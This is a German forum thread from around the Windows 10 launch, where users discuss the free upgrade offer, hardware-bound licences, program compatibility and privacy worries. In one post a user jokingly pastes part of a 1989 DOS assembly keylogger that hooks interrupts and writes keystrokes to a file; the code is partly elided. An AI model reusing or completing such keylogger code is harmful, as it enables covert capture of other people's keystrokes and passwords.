Windows 10: die Werbetrommel geht los

Thread Status
Hello, There was no answer in this thread for more than 30 days.
It can take a long time to get an up-to-date response or contact with relevant users.

jw500

Sehr aktives NF Mitglied
Registriert
Moin,

einige habe es vermutlich heute schon bemerkt.
Microsoft beglückt Windows 7, 8 und 8.1 Anwender mit einem Windows 10 Button unten
in der Taskliste.
Man kann sich kostenlos zum Download Registrieren lassen.

Pointe am Rande:
Von einem Kunden kam heute Morgen ein Anruf:
"Ich glaub wir haben uns einen Virus eingenfangen."
Ich: "Wie kommt ihr drauf?"
Kunde: "Wir haben alle einen Windows 10 Update Button, das gibts doch noch gar nicht."

Supergrins!

Das Erscheinungsdatum wird der 29.7.2015 sein.
Wer sich darauf einlässt bekommt eine unbefristetes Update
für genau den PC auf dem das bisherigen Windows 7 oder 8 lizenziert war.

Die kostenlose Updatemöglichkeit soll es 1 Jahr geben.

Da es zwar monetär keine Kosten verursacht bleibt abzuwarten wie wir bezahlen. Umsonst gibt keiner was.
Pentranter Druck in den Appstores die Software zu beziehen?
Ständiges Telefonieren nach Hause oder zur NSA. Bis 29.7. werden die Ihre Server schon wieder hochgefaren sein.... :)
( Oder es gab dann den Weltungergang weil die Terroristen jetzt unbeobachtet tun und lassen können was sie wollen )
Oder mit subilen Werbeinblendungen vom nächsten Baumarkt wenn man im Explorer durch die Platte klickt?
Irgendwas muss sich Microsoft erwarten, sonst würden sie nicht 1 Jahr
ein kostenloses Update anbieten.

Für den Moment gibt es für mich 2 Gründe dem Standardanwender zu raten,
das Angebot momentan nicht anzunehmen:

1. Es fehlt noch jede Erfahrung welche Programme mit Win 10 laufen, welche
Probleme es aufwerfen wird, und das kann man nach der Erfahrung mit der letzten Beta von Windows 8 auch nicht auf das finale Produkt schliesen.
Damals wurde kurz vor Auslieferung, die Möglichkeit das Startmenü zu aktivieren, entfernt. Damit wurde es bei vielen zum Hassobjekt.

2. Das kostenlose Update für die eingesetzte Hardware heist:
Bei Mainbaord Defekt ist die Lizenz futsch. Das ist vor allem dann ärgerlich wenn man bisher nicht Hardwaregebundene Lizenzen einsetzt, wie ich das mache und auch meinen Kunden verkaufe.
Windows XP Lizenzen hatten wir über die Jahre auf bis zu 3 Gerätegenerationen im Einsatz.
Vielleicht sieht es MS nicht so eng oder rudert bei einem Shitstorm zurück wie sie es bei Office zuletzt gemacht haben.
Der Lizenztext gibt momentan einen Hardwareumzug eher nicht her.

Weiterführende Informationen finden sich hier:

http://www.heise.de/newsticker/meld...Windows-Nutzer-und-Release-Datum-2671886.html

http://www.heise.de/newsticker/meldung/Windows-Update-installiert-Downloader-2595970.html



Gruß
Jürgen
 
Anzeigen
Also ich habe noch keinen Button und ich werde mit absoluter Sicherheit nicht zu den ersten gehören, die auf Windows 10 aufrüsten. Insofern sehe ich dem ganzen sehr gelassen entgehen und bin gespannt, wann welche ersten Schreckensmeldungen erscheinen.
 
Kommentar
Also ich nutze die Beta seit ca. 3 Monaten, und sie läuft äußerst stabil, will heißen: noch keine Systemabstürze etc.
Alle Programme funktionieren problemlos, bei fehlenden Treibern, habe ich die von 8.1 genommen.
 
Kommentar
Die wesentlichste fotografische Frage im Zusammenhang mit der Einführung von Windows 10 aus meiner Sicht ist die, ob der trotz aller Macken beste, jemals für Nikon entwickelte Rawkonverter Capture NX2 laufen wird.

:fahne:
 
Kommentar
Ich habe Win 10 seit ca. 6 Monaten in der Pre irgendwas Version, hat sich seitdem 6 mal neu installiert ohne Probleme zu hinterlassen. Momentan ist es die Pro Insider Preview Version. Damals wurde den Testuser eine kostenlose Vollversion versprochen.
Alle Programe laufen bei mir Problemlos
Bis jetzt bin ich voll zufrieden. Der neue Browser ( Spartan ) ist jetzt noch nicht so mein Ding.

Gruß
Thomas
 
Kommentar
Die Umstellung von
Win 3 auf Win 9x
9x nach NT
NT nach Win2000/XP
XP->Vista/Win7 64bit war jeweils ein richtig großer Bruch
im System mit den Verwerfungen für die Software als auch für die benötigten Treiber.
Und der ganz große Knackpunkt war dann noch die Inkompatibilität der
16 Bit Software auf den Windows 64 bit Versionen.

Auch wenn es die Versionsnummern anders scheinen lassen.
Um sich bewusst zu machen dass es seit Vista nur mehr oder weniger große Facelifts gab muss man sich nur die internen Versionsnummern ansehen:

Vista / 6.0
Windows 7 / 6.1
Windows 8 / 6.2
Windows 8.1 / 6.3

Und Windows 10 müsste eigentlich 6.4 heissen, hat aber einer
sich mir noch nicht erschlossenen Logik auch nicht den Namen Windows 9 sondern 10 bekommen.

So ein Theater wie mit Windows Vista ( wurde erst mit den letzten Servicepacks erträglich ) und dann mit dem 8er Bedienkonzept denke ich wird es mit Windows 10 nicht geben.

Gruß
Jürgen
 
Kommentar
... für Nikon entwickelte Rawkonverter Capture NX2 laufen wird.

Habs grad mal probiert, lässt sich installieren und die groben Funktionen gehen auch, wenn ich in Bilderordner gehe die schon älter sind. D750, D810....

Meinen Lizenzschlüssel hab ich aber schon lange verkauft und nicht vermisst....

Manche Probleme zeigen sich manchmal auch erst später.
Gibt z.B. Symantec Software die lässt sich 30 Tage problemlos unter Windows 8.1 einsetzen. Nur aktivieren lässt es sich nicht. Weil der Hersteller keinen Bock hat.
 
Kommentar
Bin mal gespannt wann die Auslieferung beginnt,
wenn die finale Version da ist, denke ich werde ich mich tiefer damit beschäftigen und ggf. berichten.
 
Kommentar
Hallo Jürgen!
Wer sich darauf einlässt bekommt eine unbefristetes Update für genau den PC auf dem das bisherigen Windows 7 oder 8 lizenziert war.
Da würde mich interessieren, ob das Win10 das mir für den älteren 32-Bit-Win7 PC, auf dem meine 16-Bit-Finanzbuchhaltung läuft, angeboten wird, auch eine 32-Bit-Version sein wird.
Weiß Irgendjemand hier dazu schon etwas?
 
Kommentar
Wenn es nicht um den eigenen Spieltrieb geht, gibt es nur
in ganz wenigen Fällen Sinn einen PC auf ein neues Betriebssystem zu aktualisieren. Meist ist die Kiste dann doch eh schon alt und ob
da nun Windows 7 oder 8 oder 10 drauf läuft?
Wen juckt das?
Oder hast Du vor Support Ende von Windows 7 im Januar 2020 Angst?

Ich habe ab Anfang 2010 die 64bit Version genommen und nur in Einzelfällen mit 16bit Software
als Hauptanwendung noch die 32er installiert.
Selbst Windows 8.x hab ich noch nie als 32er installieren müssen.
Gruß
Jürgen
 
Kommentar
Irgendwas muss sich Microsoft erwarten, sonst würden sie nicht 1 Jahr
ein kostenloses Update anbieten.

Moin Jürgen,

danke für deine Einschätzung.

Zu deiner Frage habe ich eine Idee. Ich habe vor einigen Wochen einen Vortrag von Microsoft gehört, auf dem sehr klar gesagt wurde, was Microsofts Problem ist.
Wie wir alle wissen, hat Windows irgendwas um 95% (oder bisschen weniger wegen der Macs jetzt, egal) Marktanteil auf Desktop/Laptop Rechnern.

Der gemeine Benutzer geht aber zunehmend mit Tablets, Smartphones und ähnlichen Dingen auch in die Arbeitswelt. Und wenn man diesen Markt hinzurechnet, hat Microsoft plötzlich nur noch einen Marktanteil von 15%.

Also will man schlicht und ergreifend Footprint, würde ich sagen. Windows 10 überall. Dank der Tatsache, dass dafür programmierte Apps auf allen Windows 10 Devices laufen, erhofft MS sich somit sicher auch eine stärkere Durchdringung bei den App Entwicklern.

Dass die alle irgendwohin telefonieren ... alle ...
 
Kommentar
An Michael,
ja auch das ist wohl wahr.
Darum war die Idee ein identisches Bedienkonzept vom Handy bis zum
Desktop einzuführen bei Windows 8 ja an sich gut.
Nur die Umsetzung ist misslungen.

Ich will meine Desktop Screens nicht betatschen und nicht witzlose Apps
die mir zum Wiedergeben einer Sprachnachricht als Fullscreen aufpoppen.
An Windows 10 sieht man, dass Microsoft die Kritik angenommen hat
( oder nehmen musste ).

Auf Dauer kann ich mir schon vorstellen, dass ne App die man am Streichelgerät liebgewonnen hat, auch auf dem Desktop Sinn geben kann.

Wobei ich ausser für Email in der Berufswelt nur winzige Bereiche
sehe die man bei meinen Kunden mit Tabletts oder Handys abdecken kann.
Egal ob das der Rechtsanwalt ist der am Text arbeitet oder der Konstrukteur,
oder der Vertriebler.
Aber sicher sind meine Kunden nicht repräsentativ für die gesamte IT Welt.

Gruß
Jürgen
 
Kommentar
Lightroom 6 läuft übrigens auch drauf.
Die Beta Version von Office 2016 verbindet mir nicht mit meinem Exchange 2010 Server. Mal warten was die Finale Version bringt. Und
den Exchange Server wollte ich eh neu aufsetzen...
 
Kommentar
Bei mir wird es kein W10 geben. Warum? Weil der Gedanke, dass die mir das Betriebssystem jederzeit zu machen können und mir vorschreiben, was ich ab dann gefälligst für Software zu installieren habe, nicht gefällt. Also so, wie das Apple heute schon macht und einen Apple hab ich auch nicht.

Letztens bei heise in den Kommentaren gelesen:
Der tanzende Affe :lachen:
 
Kommentar
Wovor habt Ihr Angst?
Die NSA Server sind grad aus.
Die Luschen!
Und was die können?
Sollen mal früher aufstehen.
Keyboard-Logger von 1989...



comment %
Programm zum mitloggen der Tastatureingaben
%
code segment
assume cs:code; ds:code; es:code; ss:code


org 82h
File label byte ; šbergabeparamter /Filename


org 100h
start: jmp install


oldss dw (0)
oldsp dw (0)
oldint5 dd (0)
oldint8 dd (0)
oldint16 dd (0)
oldint28 dd (0)
indosflag dd (0)
Ticks dw (0)
activ db (0)
activflush db (0)
activclose db (0)
handle dw (0)
flushbuffer db (0)
KeyPressed db (0)
EndLog db (0)
Len dw (0)
NewBegin dw (1)



KeyBuffer dw 200h dup (0)
dw 200h dup (0)
OwnStack dw (0)


beep proc near
push ax
push bx
push cx
mov bl, 6
mov al, 10110110b
out 43h, al
mov AX, 1533h
out 42h, al
mov al, ah
out 42h, al
in al, 61h
or al, 3
out 61h, al
sub cx, cx
l1: loop l1
dec bl

.
.
.
.
.
cmp byte ptr [ bx + 2 ], '\'
jne exit
call MakeZeroToString
call GetHandle
cmp handle, 0
jnz weiterinstall
jmp exit
weiterinstall:
call ClearKeyBuffer
call GetIntVektors
call SetIntVektors
mov dx, offset MakeZeroToString
inc dx
;endles: jmp endles
int 27h


exit: call beep
mov ah, 9h
mov dx, offset FileError
int 21h
int 20h


FileError db 0dh,0ah, 'Kann Datei nicht ”öffnen!',0dh, 0ah, 0dh, 0ah
db 'Aufruf: "KEYS Laufwerk:\Pfad\Dateiname"',0dh,0ah,'$'
hallo: db 13, 10, 'Keyboard-Saver 1.02'
; db 13, 10, 13, 10, 'geheim'
db 13, 10
db 13, 10, 'written by jw500'
db 13, 10, '(C)1989 blafasel', 13, 10
db '$'

code ends
end start

Das Teil um den Log mit zeitgenauen Pausen wiederzugeben hab ich auch noch. :)
 
Kommentar
Es gibt neues zu den Updatepfaden.
Und zum Umgang mit Virenscannnern.
1. Laut heise werden Virenscanner mit abgelaufenen Abos beim Update deinstalliert und der microsofteigene Defender aktiviert.
2. Gibt es neue Versionen von nicht abgelaufenen Virenscanner werden
ggf diese aktualisiert.

Da ein abgelaufener Virenscanner wohl in unvorstellbar seltenen Fällen
ziemlich dämlich ist, halte ich das für sinnvoll.
Ein deutlicher Hinweis an den Anwender wäre zusätzlich angebracht.

Und auch zu 2. kann man bei einem Update nix negatives sagen.
Wer weiss denn ob die olle Version unter Windows 10 läuft?
http://www.heise.de/newsticker/meld...raussetzungen-und-Upgrade-Pfaden-2672477.html

Interessant ist das Microsoft angeblich auch Raubkopien an dem Updateprogramm teilhaben lassen will.

Legalize it!

http://www.heise.de/newsticker/meld...ws-10-auch-fuer-Software-Piraten-2580417.html

Gruß
Jürgen
 
Kommentar
-Anzeige-
Zurück
Oben Unten